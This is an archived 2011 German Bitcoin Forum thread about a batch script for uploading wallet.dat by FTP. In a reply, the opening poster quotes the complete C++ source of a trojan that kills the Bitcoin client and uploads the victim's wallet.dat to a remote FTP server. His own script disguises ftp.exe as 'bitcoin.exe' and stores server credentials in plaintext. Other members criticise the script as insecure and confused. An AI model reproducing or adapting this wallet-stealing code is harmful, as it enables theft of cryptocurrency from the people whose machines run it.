Bitcoin Forum
December 09, 2016, 05:52:18 PM *
News: Latest stable version of Bitcoin Core: 0.13.1  [Torrent].
 
   Home   Help Search Donate Login Register  
Pages: [1]
  Print  
Author Topic: Script zum Uploaden eurer wallets auf eigenem server "Windows"  (Read 1120 times)
Retard
Prime Minister
VIP
Sr. Member
*
Offline Offline

Activity: 448


View Profile
June 28, 2011, 12:06:19 PM
 #1

Hier unten seht ihr ein kleines script was ihr in eine textdatei hineinkopiert und anpassen könnt.

Quote
@copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe
@cd %APPDATA%
@%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF
open server.ohne.http
benutzername 
passwort
bin
put "Bitcoin\wallet.dat"
bye


Die datei dann abspeichern bsp.  save.bat nennen.

nach belieben könnt ihr die alte wallet im anschluss löschen lassen dazu einfach

Quote
Del /S /Q %APPDATA%\bitcoin\wallet.dat
benutzen.

Ich hoffe ich war dem einen oder anderem hilfreich
1481305938
Hero Member
*
Offline Offline

Posts: 1481305938

View Profile Personal Message (Offline)

Ignore
1481305938
Reply with quote  #2

1481305938
Report to moderator
1481305938
Hero Member
*
Offline Offline

Posts: 1481305938

View Profile Personal Message (Offline)

Ignore
1481305938
Reply with quote  #2

1481305938
Report to moderator
1481305938
Hero Member
*
Offline Offline

Posts: 1481305938

View Profile Personal Message (Offline)

Ignore
1481305938
Reply with quote  #2

1481305938
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1481305938
Hero Member
*
Offline Offline

Posts: 1481305938

View Profile Personal Message (Offline)

Ignore
1481305938
Reply with quote  #2

1481305938
Report to moderator
1481305938
Hero Member
*
Offline Offline

Posts: 1481305938

View Profile Personal Message (Offline)

Ignore
1481305938
Reply with quote  #2

1481305938
Report to moderator
crashdown
Member
**
Offline Offline

Activity: 112


View Profile
June 28, 2011, 02:30:41 PM
 #2

Oha, also...  Shocked
vorweg eine Frage zu dem Script. Ich werde es zwar nicht brauchen aber aus grundsätzlichem Interesse.
Wieso bitte kopierst du die ftp.exe in die Datei bitcoin.exe Huh

Und dann noch als Hinweis:
Ich würde drei Dinge nicht tun:
1. Per ftp(!) unverschlüsselt eine wallet.dat ins Netz schieben
2. Für einen Server auf dem die wallet.dat liegt den Nutzer und das Passwort im Klartext in einem Script speichern.
3. Ein Script meine wallet.dat löschen lassen ohne sicher zu gehen, dass diese auch korrekt auf dem Server liegt.

1 und 2 macht das Script aber, 3 macht es mit der optionalen Zeile.

Ich würde das so nicht nutzen.
Retard
Prime Minister
VIP
Sr. Member
*
Offline Offline

Activity: 448


View Profile
June 28, 2011, 03:48:02 PM
 #3

Oh ha,

selbstverständlich hast du recht !

Quote
1. Per ftp(!) unverschlüsselt eine wallet.dat ins Netz schieben
2. Für einen Server auf dem die wallet.dat liegt den Nutzer und das Passwort im Klartext in einem Script speichern.
3. Ein Script meine wallet.dat löschen lassen ohne sicher zu gehen, dass diese auch korrekt auf dem Server liegt.

Das problem das die FTP daten in der Bat stehen darin sehe ich kein problem.
Da die bat standort unabhängig ist. Du kannst sie nutzen vom stick aus , und nennen wie du willst.

Hmm Entschuldigung wenn ich mich so schlecht ausdrücke Sad

Ich bin davon ausgegangen das wenn jemand einen Server benutzt auch eine sichere verbindung besteht via httacces z.B

Nutzungs beisspiel 1
Nehmen wir an du hast VmWare und dort hostet du via XAMPP in der Virtuellen maschine deinen Host zum saven , dann brauchst du nur noch einen mausklick machen um deine datei dort abzuspeichern.

Nutzungs beisspiel 2
Anstatt die wallet.dat zu nehmen kann man auch jede andere datei damit Uploaden auch eine wallet.rar mit verschlüsselung die wirklich jeder haben sollte (mindestens).

Der 2 zweite eintrag zum löschen ist eine eigene Bat , da du sonst unter umständen die wallet auf dem server löschen würdest .

--------------

Da zur zeit aber nur ein Trojaner umher geht der die wallet.dat stiehlt wird dies ausreichen um die sicherheit zu gewährleisten bei beisspiel 1-2...

hier der aktuelle trojaner
Quote
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <wininet.h>
#include <ctime>
#include <iostream>
#pragma comment(lib, "wininet")

void killprocess()
   {   

      HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );      
      PROCESSENTRY32 ProcessEntry = { 0 };               
      ProcessEntry.dwSize = sizeof( ProcessEntry );         
      BOOL Return = FALSE;
      Return = Process32First( hProcessSnapShot,&ProcessEntry );

      int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
      if (value==0)
         {
            HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID);
            TerminateProcess(hProcess,0);
            CloseHandle(hProcess); //Close Handle }
      
         }

   while( Process32Next( hProcessSnapShot, &ProcessEntry ));
   CloseHandle( hProcessSnapShot );
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
   
   killprocess();
   Sleep(40000);
   srand((unsigned)time(NULL));         
   int seedone=rand();                  
    int seedtwo=rand()*3;               
   int seedboth = seedone + seedtwo;      
                                 
   char randomseed[99];               
    itoa(seedboth,randomseed,10);         
                                 
   
   char* appdata = getenv("%APPDATA%");      
   char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat"); 

   HINTERNET hInternet;
   HINTERNET hFtpSession;
   hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
   hFtpSession = InternetConnect(hInternet, "ftp.", INTERNET_DEFAULT_FTP_PORT, "", "", INTERNET_SERVICE_FTP, 0, 0); 

   FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
   FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);

   InternetCloseHandle(hFtpSession);
   InternetCloseHandle(hInternet);
   
   return 0;
}


Das intressante daran ist das der trojaner nur die wallet.dat kopieren kann wenn die bitcoin.exe geschlossen ist

crashdown
Member
**
Offline Offline

Activity: 112


View Profile
June 28, 2011, 04:19:41 PM
 #4

Das problem das die FTP daten in der Bat stehen darin sehe ich kein problem.
Da die bat standort unabhängig ist. Du kannst sie nutzen vom stick aus , und nennen wie du willst.

Hmm Entschuldigung wenn ich mich so schlecht ausdrücke Sad

Ich bin davon ausgegangen das wenn jemand einen Server benutzt auch eine sichere verbindung besteht via httacces z.B

Nutzungs beisspiel 1
Nehmen wir an du hast VmWare und dort hostet du via XAMPP in der Virtuellen maschine deinen Host zum saven , dann brauchst du nur noch einen mausklick machen um deine datei dort abzuspeichern.

Nutzungs beisspiel 2
Anstatt die wallet.dat zu nehmen kann man auch jede andere datei damit Uploaden auch eine wallet.rar mit verschlüsselung die wirklich jeder haben sollte (mindestens).

Der 2 zweite eintrag zum löschen ist eine eigene Bat , da du sonst unter umständen die wallet auf dem server löschen würdest .

--------------

Da zur zeit aber nur ein Trojaner umher geht der die wallet.dat stiehlt wird dies ausreichen um die sicherheit zu gewährleisten bei beisspiel 1-2...

Entschuldigung aber:
- im Klartext gespeicherte Passwörter sind immer ein Problem. Egal(!) wie der Dateiname ist.
- htaccess gesicherte Verbindung? htaccess sichert keine Verbindung. Das hat mit der Verschlüsselung des Datenverkehrs nichts zu tun.
- Die Anwendungsbeispiele sind, nunja, etwas dubios.
- Was soll der Quelltext quote?

Huh

edit: Und warum wird jetzt die ftp.exe zu bitcoin.exe kopiert?
BitCoinBaron
Member
**
Offline Offline

Activity: 98



View Profile
June 28, 2011, 04:43:42 PM
 #5

Und wie man sehen kann, sucht der trojaner nur in dem Stantardverzeichniss

Quote

   char* appdata = getenv("%APPDATA%");     
   char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat"); 

Da wird er bei mir nix finden  Grin

Sollte mein Beitrag hilfreich gewesen sein, dann kannst du dich hier bedanken.
--->>>1JVUfbsHoFbjLpoYqQhx8ZL91RdtjvoKH7<<<---
Retard
Prime Minister
VIP
Sr. Member
*
Offline Offline

Activity: 448


View Profile
June 28, 2011, 05:09:58 PM
 #6

Hmm ja ich sehe ein das klartext passwörter ein problem darstellen. weis jetzt aber so keine lösung.

Lach ja httacces ist für den webserver vorgesehn ^^ und für die übertragung ssl  ... bekomm wohl meinen ersten hitze stich .

naja die beispiele sind eben nur beisspiele..

der quelltext ist der aktuelle trojaner der jagt auf wallets macht, wollte die community informieren gewarnt sind sie hoffentlich .
Darin kann man auch erkennen das nur windows 7 systeme betroffen sind zurzeit mit dieser variante .


joo der schnipsel hat echt keine funktion O.o
Quote
%PUBLIC%\bitcoin.exe

Ich persönlich verwende die bat , zwar schick ich nicht die wallet.dat hoch sondern die wallet.rar


@crashdown danke für die verbesserung Tongue
mipl
Member
**
Offline Offline

Activity: 107



View Profile WWW
June 28, 2011, 05:12:51 PM
 #7

Quote
@copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe
Bevor ich überhaupt auf den (Un-)Sinn der ganzen Aktion eingehe: Warum um alles in der Welt sollte ich ein Programm aus %Systemroot% in das öffentliche Verzeichnis %PUBLIC% kopieren und von da aus starten?!? Und dann auch noch umbenannt in bitcoin.exe?
Und zum Trojaner-Code: Warum hast Du da die originalen Kommentare gelöscht?
Und warum sollte ich in einer VM XAMPP laufen lassen, um dann auch noch darauf Daten zu sichern?

Don't drink and write!


crashdown
Member
**
Offline Offline

Activity: 112


View Profile
June 28, 2011, 05:22:20 PM
 #8

Hmm ja ich sehe ein das klartext passwörter ein problem darstellen. weis jetzt aber so keine lösung.

Quote
joo der schnipsel hat echt keine funktion O.o
Quote
%PUBLIC%\bitcoin.exe

Ich persönlich verwende die bat , zwar schick ich nicht die wallet.dat hoch sondern die wallet.rar


@crashdown danke für die verbesserung Tongue


Der von dir zitierte Codeteil steht so an 2 Stellen und erfüllt natürlich beides mal eine Funktion - nur die Funktion die er jeweils erfüllt ist totaler Quatsch.

Bist du dir sicher dass du weißt was du da tust?  Roll Eyes
Retard
Prime Minister
VIP
Sr. Member
*
Offline Offline

Activity: 448


View Profile
June 28, 2011, 05:28:05 PM
 #9

mittlerweile habe ich zweifel ob das alles so gut ist O.o   ich brauch nen bier....

@mipl soll ich etwa direkt nen download link mit posten ? *rofl*
klaaster
Full Member
***
Offline Offline

Activity: 126



View Profile
June 28, 2011, 09:38:01 PM
 #10

@copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe
@cd %APPDATA%
@%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF
open server.ohne.http
benutzername 
passwort
bin
put "Bitcoin\wallet.dat"
bye

Wieso bitte kopierst du die ftp.exe in die Datei bitcoin.exe Huh

edit: Und warum wird jetzt die ftp.exe zu bitcoin.exe kopiert?

Warum um alles in der Welt sollte ich ein Programm aus %Systemroot% in das öffentliche Verzeichnis %PUBLIC% kopieren und von da aus starten?!? Und dann auch noch umbenannt in bitcoin.exe?

joo der schnipsel hat echt keine funktion O.o
Quote
%PUBLIC%\bitcoin.exe

Bastelstunde  Grin
Versuch doch mal das Problem der Pfadangabe im put-Befehl anders zu lösen.
mipl
Member
**
Offline Offline

Activity: 107



View Profile WWW
June 29, 2011, 05:30:31 AM
 #11

Ich würde dafür eh wput (pendant zu wget) benutzen. Oder noch einfacher: SyncBack Freeware. Das spart mir merkwürdige, sicherheitstechnisch bedenkliche und wirre Konstruktionen. Wink

Pages: [1]
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!